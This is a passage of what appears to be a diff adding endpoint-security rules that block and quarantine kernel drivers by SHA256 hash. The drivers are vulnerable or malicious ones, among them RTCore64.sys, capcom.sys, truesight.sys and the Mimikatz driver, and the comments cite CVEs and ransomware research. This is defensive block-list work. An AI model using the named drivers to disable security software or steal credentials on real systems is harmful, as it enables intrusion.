+ "value": "0cd4ca335155062182608cad9ef5c8351a715bce92049719dd09c76422cd7b0c",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "972ff264-e540-5887-b3d2-d53553996af0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477200Z",
+ "creation_date": "2026-03-23T11:45:30.477203Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477213Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fed0fe2489ae807913be33827b3b11359652a127e33b64464cc570c05abd0d17",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9733fd1c-53c1-5cf8-836d-d2a760efe781",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454327Z",
+ "creation_date": "2026-03-23T11:45:30.454330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97381357-272b-501c-8d30-3b07a543cb25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830034Z",
+ "creation_date": "2026-03-23T11:45:31.830036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dffb52619e11ec118a68f4aeebec49a78908de6348ae4db5eed4625028383d34",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9750936e-32e0-5a2b-bad9-30f38d4b73b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810468Z",
+ "creation_date": "2026-03-23T11:45:31.810470Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0aaa8a63ee22354585282a5aa02148c69931fc569fb059f2caf7cbeab5a81ab2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97646d4c-e763-5a56-8e49-575609477267",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482696Z",
+ "creation_date": "2026-03-23T11:45:31.482699Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482709Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60f11064c0db8906831f716c191a602abd44dbb96f07d2a1cda6a973ff2935b8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "977058a3-53ac-5252-a5d7-96237d07dc8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492126Z",
+ "creation_date": "2026-03-23T11:45:31.492128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492133Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61fbeaf94ab0cdbfb6f3ea518929651e83e6fdddc470989aaaa3177ca19350dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9776d780-c455-505e-8c80-beedeca2cd74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971125Z",
+ "creation_date": "2026-03-23T11:45:29.971128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971135Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00bef60f6b7813aec6733107144dc92f374cea63a7b612f788423bb34f8aabf8",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9776f54a-49ad-5906-8d42-636b19cd8484",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830186Z",
+ "creation_date": "2026-03-23T11:45:30.830188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50e5753471ed74c3bba67d5d959cb7a6f820a93633012c756ed40ebccc44d051",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97770fd2-96b3-523c-8c57-3be696d76f53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818983Z",
+ "creation_date": "2026-03-23T11:45:30.818985Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1126c9b043872383e5e0b1ac893ddf2238a2c130401627b259c81d98a3cefeae",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97799ae9-e443-592a-85a8-35879126da4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481256Z",
+ "creation_date": "2026-03-23T11:45:30.481258Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c0a63e8a6a335f2498794f44cf5629453075f31db314eaecbd964cf615de3f7",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "977cbb47-7a5b-582c-8b85-c282895516ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826508Z",
+ "creation_date": "2026-03-23T11:45:31.826510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826515Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00526be468c68c919a32b110c1faaa50f8ee1646a11ca856a8b6730e5505deba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "977d5e3d-c3f3-51f6-8c89-da0e14e2efda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985356Z",
+ "creation_date": "2026-03-23T11:45:29.985358Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985364Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "977e93ad-d41f-5c89-8e10-3bf19c3b7ac0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454477Z",
+ "creation_date": "2026-03-23T11:45:30.454481Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454490Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be690e8bbc4b0ba4b37c1a331294655dff0c73be530428a447e318c06ec06d57",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "978ebec5-d845-5453-a651-b8fe1c149f0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460236Z",
+ "creation_date": "2026-03-23T11:45:30.460239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3eaf041ce5f3fd59885ead2cb4ce5c61ac9d83d41f626512942a50e3da7b75a",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97955461-896c-576a-bf7e-ba061f6c9493",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817339Z",
+ "creation_date": "2026-03-23T11:45:31.817341Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817346Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0df5c9f9fd26de96f6b3d09ddc481921ba209dfcc2bcec2a9e39b7c28b802d16",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "979d1fd2-26c7-53d2-b691-4597d0ac7f8e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479845Z",
+ "creation_date": "2026-03-23T11:45:30.479847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479853Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a11b4f125d8537e69af7b684494e49ef2a30a219634988e278177fa36c934eb",
+ "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97a5cb28-a177-5e1e-9c67-8ebb2c70bd31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979308Z",
+ "creation_date": "2026-03-23T11:45:29.979310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "139f8412a7c6fdc43dcfbbcdba256ee55654eb36a40f338249d5162a1f69b988",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97a9b11b-fec6-5bfe-a073-41cba37855a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981607Z",
+ "creation_date": "2026-03-23T11:45:29.981609Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981614Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf16a2218fc8a3b6fa5aa4a0bc6205792798078c380ccc7e5041476e0f1bc53d",
+ "comment": "Vulnerable Kernel Driver (aka netflt.sys) [https://www.loldrivers.io/drivers/35a9afeb-18f1-4c02-a3aa-830e300138ae/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97d5651e-65da-5d02-9384-02f33d63639e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821539Z",
+ "creation_date": "2026-03-23T11:45:31.821541Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821546Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5404f100c0171f3485183a38770a5c37d0393aa25ce0d5a4fbb52111ecb765e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97deb0e1-f465-5e36-a73e-a01d6517cfb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155736Z",
+ "creation_date": "2026-03-23T11:45:31.155738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e95506050b5df4ccfc2b5a109022ade66604dc5dd306c7975b2e66d3888f70a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97ebd72e-eb90-5295-ba77-fc1e62a124a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609771Z",
+ "creation_date": "2026-03-23T11:45:29.609773Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa0a1de59d8697c5f39937edeb778fde7c596b71d64d3427c80fe4c060488990",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97f330cc-c639-59d0-a317-d5e284fc011e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454681Z",
+ "creation_date": "2026-03-23T11:45:30.454684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454694Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16360ead229b13deb47bc2bef40f282474c9f18c213c636cdfb8cc2495168251",
+ "comment": "Vulnerable Kernel Driver (aka inpout32.sys) [https://www.loldrivers.io/drivers/97fa88f6-3819-4d56-a82c-52a492a9e2b5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "980692a7-4c61-57d0-886e-dd8834c9972f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
